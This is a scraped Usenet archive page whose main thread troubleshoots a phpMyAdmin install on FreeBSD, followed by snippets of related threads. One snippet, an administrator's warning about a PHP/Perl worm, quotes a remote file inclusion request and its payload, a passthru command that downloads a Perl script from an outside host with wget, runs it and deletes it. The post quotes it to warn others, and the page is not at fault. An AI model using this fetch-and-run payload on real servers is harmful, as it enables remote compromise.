php

Hi Guys,

Installed FreeBSD 5.1;fine Got Apache2, MySQL working.
Installed php 4.3.4 ok
Try to run phpMyAdmin (latest version), but somehow there isn't anything
generated.
Am I overlooking something?
Like installing a lib?

Any nfo is welcome

Henk Lutgerink
http://avatar.demon.nl
0
henk
11/29/2003 12:53:04 PM
comp.unix.bsd.freebsd.misc 13187 articles. 1 followers. Post Follow

henk lutgerink wrote:
> Hi Guys,
>
> Installed FreeBSD 5.1;fine Got Apache2, MySQL working.
> Installed php 4.3.4 ok
> Try to run phpMyAdmin (latest version), but somehow there isn't anything
> generated.
> Am I overlooking something?
> Like installing a lib?

You don't say whether you've installed the phpMyAdmin port. (In
/usr/ports/databases.)
--
Bob
London, UK
Robert Downes wrote:

> henk lutgerink wrote:
>> Hi Guys,
>>
>> Installed FreeBSD 5.1;fine Got Apache2, MySQL working.
>> Installed php 4.3.4 ok
>> Try to run phpMyAdmin (latest version), but somehow there isn't anything
>> generated.
>> Am I overlooking something?
>> Like installing a lib?
>
> You don't say whether you've installed the phpMyAdmin port. (In
> /usr/ports/databases.)
yes, I did install phpMyAdmin in /usr/ports/database.

I got the feeling I still have to ./configure, make, make install?
If so Please let me know.

ps: server is running on http://avatar.demon.nl
0
henk
12/1/2003 6:39:23 AM
henk lutgerink wrote:

> yes, I did install phpMyAdmin in /usr/ports/database.
>
> I got the feeling I still have to ./configure, make, make install?
> If so Please let me know.

If you didn't do `make; make install` to install phpMyAdmin, how did you
install it?

../configure is not something I've ever done in FreeBSD, but it may be a
possible command. I tend to set compile variables through the shell
environment.

By the way, what are you using phpMyAdmin for? I just use the mysql
command line tool. It's not exactly graphical, but it's easy.
--
Bob
London, UK
echo Mail fefsensmrrjyaheeoceoq\! | tr "jefroq\!" "@obe.uk"
0
Robert
12/2/2003 5:15:31 PM
In article <3fccc8b4$0$122$65c69314@mercury.nildram.net>, Robert Downes wrote:
> henk lutgerink wrote:
>
>> yes, I did install phpMyAdmin in /usr/ports/database.

I sure do hope you installed _from_ /usr/ports/databases/phpmyadmin?
The default target is /usr/local, or /usr/X11R6 for X-based Stuff.

>> I got the feeling I still have to ./configure, make, make install?
>> If so Please let me know.

All you do is

  cd /usr/ports/databases/phpmyadmin
  make install

That _should_ take care of all you need.

> ./configure is not something I've ever done in FreeBSD, but it may be a
> possible command. I tend to set compile variables through the shell
> environment.

You can, of course, do it yourself if you want to. You can also have
the ports system do it for you. make configure does everything up to
and including any configure step, but no further.

> By the way, what are you using phpMyAdmin for? I just use the mysql
> command line tool. It's not exactly graphical, but it's easy.

*shrug* At this point I see no reason to ask that question. phpMyAdmin
is for administrating a MySQL database through a php-enabled webserver.

Some people like GUIs. Some like command line tools more. Whatever.
If there were some indications OP was trying to use $app for something
it clearly wasn't intended for (and maybe there's a better solution),
then, yes. But at this point, no.

jpd
12/2/2003 5:50:47 PM
jpd wrote:
> *shrug* At this point I see no reason to ask that question. phpMyAdmin
> is for administrating a MySQL database through a php-enabled webserver.

Ah, jpd. It's been a while since I felt flames from your direction. I'd
gone ever-so-slightly cold.

> Some people like GUIs. Some like command line tools more. Whatever.
> If there were some indications OP was trying to use $app for something
> it clearly wasn't intended for (and maybe there's a better solution),
> then, yes. But at this point, no.

Yes, I know what phpMyAdmin is. But I wondered if henk could point out
some killer feature that I'd never noticed. I love GUIs, but web-based
SQL tinkering has never seemed much superior to command-line flexibility.
--
Bob
London, UK
echo Mail fefsensmrrjyaheeoceoq\! | tr "jefroq\!" "@obe.uk"
0
Robert
12/4/2003 2:06:27 AM
In article <3fce96a4$0$92539$65c69314@mercury.nildram.net>, Robert Downes wrote:
> jpd wrote:
> Ah, jpd. It's been a while since I felt flames from your direction. I'd
> gone ever-so-slightly cold.

Right in time for the cold season, then.

[snip]
> Yes, I know what phpMyAdmin is. But I wondered if henk could point out
> some killer feature that I'd never noticed.

[...] given that he didn't get it to install. Then again, you never know.

> I love GUIs, but web-based
> SQL tinkering has never seemed much superior to command-line flexibility.

GUIs don't appeal much to me. And frankly, using a deci-megabyte app. just
as an intermediate, never made much sense to me. It's slow as hell, too.

Then again, sometimes you want to have everything, --or at least a large
chunk of that-- at once on your screen. Graphical stuff can help there.
And, of course, there's the effect of n00b no understand, n00b scaaared,
which many believe can be alleviated by throwing lots of eye-candy at
said n00b. So much so that eye-candy seems to have become a requirement.

jpd
12/4/2003 9:12:09 AM
jpd wrote:

> GUIs don't appeal much to me. And frankly, using a deci-megabyte app. just
> as an intermediate, never made much sense to me. It's slow as hell, too.

Do you mean deka-megabyte? A deci-megabyte seems very small. But, having
used Windows for five years, anything under 100Mb seems small.

> Then again, sometimes you want to have everything, --or at least a large
> chunk of that-- at once on your screen. Graphical stuff can help there.
> And, of course, there's the effect of n00b no understand, n00b scaaared,
> which many believe can be alleviated by throwing lots of eye-candy at
> said n00b. So much so that eye-candy seems to have become a requirement.

Oh, yeah, I've definitely got to make you a high-level admin on my forum
system. Which you'll be pleased to know does not use any graphics at
all. (I can't afford the extra bandwidth.) I'll just have to persuade
you to stay out of any beginners' boards.
--
Bob
London, UK
echo Mail fefsensmrrjyaheeoceoq\! | tr "jefroq\!" "@obe.uk"
0
Robert
12/4/2003 3:32:26 PM
> ps: server is running on http://avatar.demon.nl
Ummm, do you really really think that:

a.) putting warez on a public webserver (the names kind of imply
     that...)
and
b.) making the address public

is a good idea?

Just my $0.02
Holger
0
Holger
12/4/2003 4:59:09 PM
In article <3fcf538c$0$98781$65c69314@mercury.nildram.net>,
Robert Downes wrote:
> jpd wrote:
>> GUIs don't appeal much to me. And frankly, using a deci-megabyte app. just
>> as an intermediate, never made much sense to me. It's slow as hell, too.
>
> Do you mean deka-megabyte? A deci-megabyte seems very small. But, having
> used Windows for five years, anything under 100Mb seems small.

Probably, yeah. (Don't post before coff^Wtea in the morning...)

[snip]
> Oh, yeah, I've definitely got to make you a high-level admin on my forum
> system. Which you'll be pleased to know does not use any graphics at
> all. (I can't afford the extra bandwidth.) I'll just have to persuade
> you to stay out of any beginners' boards.

I'll stick to usenet, thanks.

jpd

Is FreeBSD backwards-compatible with the old BSD Unix?
I have some old binaries which were developed years ago on BSD Unix. Should these still work, as is, on the FreeBSD system? I am starting to download the latest version of FreeBSD now. I assume I only need the Disc1 and Disc2 CD images to install it, and not the BootOnly CD image. I am downloading the Docs CD image too... I used to be an administrator for SCO UNIX (ver 5.0.4 and 5.0.5) before switching over to Red Hat Linux. Is BSD similar to SCO? Thank you in advance for your answers! Stang1 <scott_navarre@yahoo.com> wrote: : I have some old binaries which were developed years ago on BSD Unix. : Should these still work, as is, on the FreeBSD system? ; Highly unlikely. Were the compiled for i386? Other problems you are likely to find is a.out is no longer standard, ELF is. However, I believe if you install the FREEBSD3X compatibility suite, a.out will run. Now, if you were to rebuild from source, the make will likely work with little fuss. And the APIs are probably still close enough to get past the compiler. : : I am starting to download the latest version of FreeBSD now. I : assume I only need the Disc1 and Disc2 CD images to install it, and not : the BootOnly CD image. ; You will need to boot CD, plus disk1. The boot CD should be self-explanitory, the disk1 CD will contain the stuff you selected. : : I used to be an administrator for SCO UNIX (ver 5.0.4 and 5.0.5) : before switching over to R...

BSD!!! BSD!!! BSD!!!
From http://groups.google.com/group/comp.unix.bsd.misc/about Top posters This month 10 markhob...@hotpop.donottypethisbit.com 2 r...@zedat.fu-berlin.de 2 wilcox_and...@childcustodyfordads.eyetraffic.net 1 will...@wilbur.25thandclement.com 1 r...@invalid.address.org 1 ian-n...@hotmail.com 1 rweiku...@mssgmbh.com 1 p...@pk.invalid 1 usenet-nos...@seebs.net 1 rd...@spamcop.net All time 440 pe...@baileynm.com 282 pe...@abbnm.com 252 se...@plethora.net 187 j...@ida.interface-business.de 181 pe...@nmti.com 163 tchr...@mox.perl.com 160 daniel.n.john...@worldn...

BSD!! BSD!! BSD!!
FRom http://groups.google.com/group/comp.unix.bsd.netbsd.misc/about Top posters All time 224 p99dr...@criens.u-psud.fr 192 bou...@antifer.ipv6.lip6.fr 190 fr...@immanent.net 178 te...@lambert.org 165 bj...@cus.cam.ac.uk 161 t...@panix.com 160 f...@enteract.com 133 read_the_...@do.not.spam.it 128 burg...@mitre.org 111 ignat...@cs.uni-bonn.de From http://groups.google.com/group/comp.unix.bsd.freebsd.misc/about Top posters This month 11 i...@satcidananda.16x108.merseine.nu 9 wbl...@wonkity.com 8 secret...@lxny.org 7 rd...@spamcop.net 5 amia9...@mypacks.n...

Unix, Minix, Linux, System V and BSD Unix ???

www.unix-solution.org (Unix/BSD Forum)
Dear all, http://www.unix-solution.org This is a UNIX forum. If you are interested, pls have a look and register a account to discuss. It's a new site but you can post your question on there. I'm sure you can get your answer from unix-solution.org if post your message. Have Fun! In article <8342be4c.0402280825.310622ee@posting.google.com>, pcman wrote: [snip] > This is a UNIX forum. > If you are interested, pls have a look and register a account to discuss. > It's a new site but you can post your question on there. > I'm sure you can get your answer from [site] if post your message. This seems to be the latest variant of ``hello, i 14 and l0k my k00l www!!1'' What in the world would people on usenet[0] possibly want that they can't get here but can get on your scripted website[1]? Even if this wasn't a piss-poor attempt at a flame, you'd need to include that little bit of info to actually get people to abandon their favourite way of interacting for something new, shiny and kludgy. [0] A system that's been around a while and that works, and doesn't come down when your mom pulls the plug because your room needs cleaning. [1] No choice in clients, egotripping so-called moderators, and it invariably attracts lots of AOLers that can't speel. Joy. -- j p d (at) d s b (dot) t u d e l f t (dot) n l . ...

unix / php 4.4.0 / php.ini ?
hi all, i cant find php.ini in upgraded php from 4.3.7 ?!?!? where the hell is it ? the prefix is new but there is no lib directory /usr/local/php-4.4.0/ On Mon, 08 Aug 2005 16:25:48 +0200, g0c wrote: > where the hell is it ? find / -name "php.ini" -- JDS | jeffrey@example.invalid | http://www.newtnotes.com DJMBS | http://newtnotes.com/doctor-jeff-master-brainsurgeon/ On 2005-08-08, g0c <REMOVEg0c@msn.com> wrote: > hi all, > i cant find php.ini in upgraded php from 4.3.7 ?!?!? > where the hell is it ? > the prefix is new but there is no li...

PHP/Perl/Unix Virus: delete config.php files asap
There were some strange requests to my server asking for config.php file (which I do not have in the requested location). I did some investigation. Seems to be a virus written in perl, exploiting a vulnerability in php code. The requests are like this 216.120.231.252 - - [30/Aug/2006:13:28:03 -0500] "GET /algebra/about/history/config.php?returnpath=http://domates.1gig.biz/spread.txt? HTTP/1.1" 404 561 "-" "libwww-perl/5.805" File spread.txt contains this: <? passthru('cd /tmp;wget http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*'); pas...

[News] BSD/UNIX Still Thrive in Way, PC-BSD Can Run Windows Applications

php and freebsd question
Hi there, I'm having a problem with my server, the submit value of the buttons doesn't work out. In the end of this post you'll find a little simple script that prints "pressed the button" when u press the button 'start'. This doesn't work at all :) Can som1 tell me what I've done wrong? I think its the server, its running FreeBSD 4.8 in combination with Apache2 and mod_php4. You can check the script at http://213.51.32.233/simple.php and my configuration at http://213.51.32.233/test.php . thanks alot greets Danny <?php if ($submit...

setting up PHP on FreeBSD
I've got a client who signed up with a company running FreeBSD. PHP is installed, but it's pretty minimal: FreeBSD mydomain.net 4.8-RELEASE FreeBSD 4.8-RELEASE #0: Thu Nov i386 './configure' '--with-apache=/root/work/apache_1.3.27' '--with-mysql' '--with-openssl' I want to install mhash and gd. However, I cannot find the configure command. I tried: find / -iname "*configure*" -maxdepth 12 and it returned a couple files, neither of which was the one I was looking for. I was logged in as root. They're running Webmin, but I couldn&#...

MUMPS for BSD/Unix
Aloha, Is anyone here aware of any available Open Source MUMPS Release for the FreeBSD operating system? Thank you, Steven Tomlinson Pacific Telehealth and Technology Hui A Dod/VA Joint Venture www.PacificHui.org You are looking for Mumps-V1: sourceforge.net/projects/mumps/ Ray Newman's great contribution. "Steven Tomlinson" <stevet@programmer.net> wrote in message news:3f4a7525$0$43849$39cecf19@news.twtelecom.net... > Aloha, > Is anyone here aware of any available Open Source MUMPS Release for the > FreeBSD operating system? > > Thank you, > Steven...

is freebsd = linux = unix?
is freebsd = linux = unix? -- In article <bi7cch$lou3@imsp212.netvigator.com>, Mylinux wrote: > is freebsd = linux = unix? No: FreeBSD > Unix >> Linux ;-) -- Erik Nygren e r i k { a t } s w i p { d o t } n e t Linux - If you hate Microsoft, FreeBSD - If you love Unix Erik Nygren wrote: > No: FreeBSD > Unix >> Linux ;-) Where does Windows XP or 2003 fit in there? -----= Posted via Newsfeeds.Com, Uncensored Usenet News =----- http://www.newsfeeds.com - The #1 Newsgroup Service in the World! -----== Over 100,000 Newsgroups - ...

Single UNIX Specification and FreeBSD
To all, In light of recent legal scuffles between SCO and just about everyone else in the open-source community, here is a question: As we know, the Open Group is the rightful owner of the trademark UNIX and its specifications. What would/could the potential benefits be for FreeBSD if it undergoes the UNIX certification process and be certified as a "UNIX" operating system? How would that help/hurt this community? (As an aside, if memory serves, Michael Lucas briefly touched on this issue in "Absolute BSD" when he said that it is highly unlike that FreeBSD...

freebsd with apache, php and mysql
Hello! I install freebsd 6.1 and it work fine. I want to work with apache, php and mysql I install the package apache-2.0.58_1.tbz , php5-5.1.4.tbz , mysql-client-5.0.22.tbz , mysql-server-5.0.22.tbz with the pkg_add command If i connect to my database with mysql client it work fine. In the command line i can execute php scripts If i try to access a html file to my apache server from another computer it work fine but it don't execute my php script. I had this line in httpd.conf Addtype application/x-httpd-php .php But it don't change anything. apache do not execute my php scripts How can i resolve my trouble?? Thank! -- oo_[:]o Yves Savoie maxwell@globetrotter.net In our last episode, <0pzvg.142020$S61.8535@edtnps90>, the lovely and talented Yves Savoie broadcast on comp.unix.bsd.freebsd.misc: > Hello! > I install freebsd 6.1 and it work fine. > I want to work with apache, php and mysql > I install the package apache-2.0.58_1.tbz , php5-5.1.4.tbz , > mysql-client-5.0.22.tbz , mysql-server-5.0.22.tbz with the pkg_add command > If i connect to my database with mysql client it work fine. > In the command line i can execute php scripts > If i try to access a html file to my apache server from another computer it > work fine but it don't execute my php script. > I had this line in httpd.conf > Addtype application/x-httpd-php .php > But it don'...

php to php obj
Hi All, Is there any tool to convert the .php files into its object files in deploying the files to other's server like java classes are deployed? Thanks in advance --AR John7481 <arjohn7481@hotmail.com> wrote or quoted: > Is there any tool to convert the .php files into its object files in > deploying the files to other's server like java classes are deployed? To what end? Do you want a PHP obfuscator? They tend not to be needed - since the code remains on the server. Do you want a PHP squeezer? Again - since PHP remains on the server that is of reduced importanc...

Printing through PHP on a UNIX system
Hello, I'm a *novice* at both using PHP and UNIX, and came across a problem while trying to modify an ex-coworkers PHP code for printing. The original script sent one huge print job to our printing server, which worked fine since we weren't printing duplex. We'd like to now split the jobs up and send them individually, which we easily achieved using a while loop to send each job. The problem is that since the printer is in duplex mode now, if you have two jobs which are 1 sheet each they will print them each on one side of the paper. Obviously not a good thing for two seperate ...

Oh dear god! Unix Unix Unix! DIE!!!!!!!!!!!
Ok, I pretty much gave up on Unix. Spent three weeks just trying to get 1 simple application running on it. All it took was Apache, MySQL, php, and phpmyadmin. Read books, read posts, read newsgroups... Simply can't be done without hiring someone and I really wanted to learn it myself. Somehow after 100-150 hours of trying things I just snapped and lost my mind. I literally smashed the Mac-Mini and a Wintel box with Fedora Core 4 into 1,000,000 pieces with an axe. I figure i'm losing at least $500 a day right now because I'm completely down. That may not seem like a lot bu...

Printing through PHP on a UNIX system
Hello, I'm a *novice* at both using PHP and UNIX, and came across a problem while trying to modify an ex-coworkers PHP code for printing. The original script sent one huge print job to our printing server, which worked fine since we weren't printing duplex. We'd like to now split the jobs up and send them individually, which we easily achieved using a while loop to send each job. The problem is that since the printer is in duplex mode now, if you have two jobs which are 1 sheet each they will print them each on one side of the paper. Obviously not a good thing for two seperate bi...

FreeBSD, Apache, PHP and Firebird2
After spending many late nights trying to make this work, I've finally found a working combination, and figured this might be a good place to sum up some of the potholes I've been in.... Years ago, I set up a few systems running Apache1.3x, PHP4.x and using Firebird 1.5x as the db engine. It worked great for many years as the systems just sat there doing their thing - basically with no maintenance. Recently I had reason to set up a new machine, and of course I started with a fresh FreeBSD 7.0. Apache2, PHP5 both installed fine from ports, but Firebird2 exits with "please don't compile as root". The workaround I found was to create a "work" directory under both /usr/ports/databases/firebird2-client and /usr/ports/databases/firebird2-server, and then set the owner to both directories to my "wheel" user. Now I could exit root, and do "make install clean" in the server directory to get both built. I couldn't find a straightforward how-to anywhere, so this is the best I could come up with... So far so good. Then I had to go to /var/db/firebird and do 'chown firebird:firebird security2.fdb'. Seems like something that the install script should do, but it apparently doesn't... So, after make:ing the php5-extenstions port with the interbase option turned on I tried connecting to a test db from PHP. That gave me a SEGFAULT! This is where I spent a few days recompiling, reinstalling ...

pscp Unix to Unix
I'm using the pscp command to get a file from a Unix ftp server. Here's the command: pscp -v -P 22 -pw MYPASSWORD -batch MYUSER@some.location.edu:/src// file.txt file2.txt Here's the trace: Server version: SSH-1.99-OpenSSH_4.5 We claim version: SSH-2.0-PuTTY_Release_0.60 Using SSH protocol version 2 Doing Diffie-Hellman group exchange Doing Diffie-Hellman key exchange with hash SHA-256 Host key fingerprint is: ssh-rsa 2048 71:8a:33:8d:e7:41:95:45:c2:f2:77:ff:27:aa:0a:bb Initialised AES-256 SDCTR client->server encryption Initialised HMAC-SHA1 client->server MAC algorithm Ini...

MS FoxPro Unix on FreeBSD
This is what I do: http://www.freebsdforums.org/forums/showthread.php?s=&threadid=26277 Is there a question here? Rick "Michael Green" <michaelrmgreen@yahoo.co.uk> wrote in message = news:e5c9d40b.0411080508.729a7121@posting.google.com... > This is what I do: > = http://www.freebsdforums.org/forums/showthread.php?s=3D&threadid=3D26277 "Rick Bean" <rgbean@NOSPAMmelange-inc.com> wrote in message news:<10ov2c9kgs1460f@corp.supernews.com>... > Is there a question here? > > Rick > No, the post is for a collection ...

Merging BSD/OS and FreeBSD
I was wondering how many ideas/concepts did FreeBSD and BSD/OS were merged pre BSD/OS-5.X? -- Member - Liberal International This is doctor@nl2k.ab.ca Ici doctor@nl2k.ab.ca God, Queen and country! Beware Anti-Christ rising! Birthdate: 29 Jan 1969 Redhill Surrey England ...

unix version of unix
I need to install version of clipper under Solaris intel platform . Where can I find it easily downloaded and easily exapnded ? "hpy_awad@yahoo.com" <ehab_aziz2001@yahoo.com> wrote in message news:7ecaee57.0402032342.679c3b02@posting.google.com... > I need to install version of clipper under Solaris intel platform . > Where can I find it easily downloaded and easily exapnded ? I use FlagShip. It's an excellent product. But not free! It is available for Sun Solaris. Visit www.fship.com -- Norman Perelson http://www.shopkeeper.co.za mailto:norman@shoso.co.za ...

php outside php (?)
Sounds weird, i know. What i want/wonder is the following: PHP can do the next: <?php if($foo == 'bar') { ?> Ow yeah, foo is bar! <?php }; ?> But how can i do the following: <?php $foo= ?> this is what foo looks like. <?php }; ?> This way i could edit the content of $foo in DW's design-view. I hope it's clear enough for you all to understand... Greetings frizzle. frizzle wrote: > But how can i do the following: > > <?php > > $foo= > > ?> > this is what foo looks like. > &l...

Web resources about - php - comp.unix.bsd.freebsd.misc

PHP - Wikipedia, the free encyclopedia
.php, .phtml, .php4, .php3, .php5, .phps PHP code can be simply mixed with HTML code, or it can be used in combination with various templating ...

PHP - Wikipedia, the free encyclopedia
.php, .phtml, .php3, .php4, .php5, .phps PHP code may be embedded into HTML code, or it can be used in combination with various web template ...

Chapman PHP Web Services - Home
Chapman PHP Web Services home page.

..:: PHP GROUP ::..
Home Feedback Contact Us Site Map www website 22nd May 2012 Investors & Associates Awards & Achievements PHP Clients Customer Support PHP Services ...

The Complete list of PHP Podcasts, Screencasts, and Video Podcasts.
A complete list of all PHP podcasts, screencasts and video podcasts, aggregated into a single feed. Come explore all the podcasts that the PHP ...

PHP: The Right Way
An easy-to-read, quick reference for PHP best practices, accepted coding standards, and links to authoritative PHP tutorials around the Web

Freelance PHP, Freelance PHP Developer, Freelance PHP Programmer, PHP Freelancer, PHP Freelancer India ...
Freelance PHP, Freelance PHP Developer, Freelance PHP Programmer, PHP Freelancer, PHP Freelancer India ...

PHP: Hypertext Preprocessor
... general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. If you are new to PHP and want ...

CakePHP: the rapid development php framework. Pages
... are built-in. Translations, database access, caching, validation, authentication, and much more are all built into one of the original PHP MVC ...

PHP Advent 2011
C hristmas is upon us once again, and it’s time to have a look at what’s under the PHP Advent tree. Join us each day as our wonderful authors ...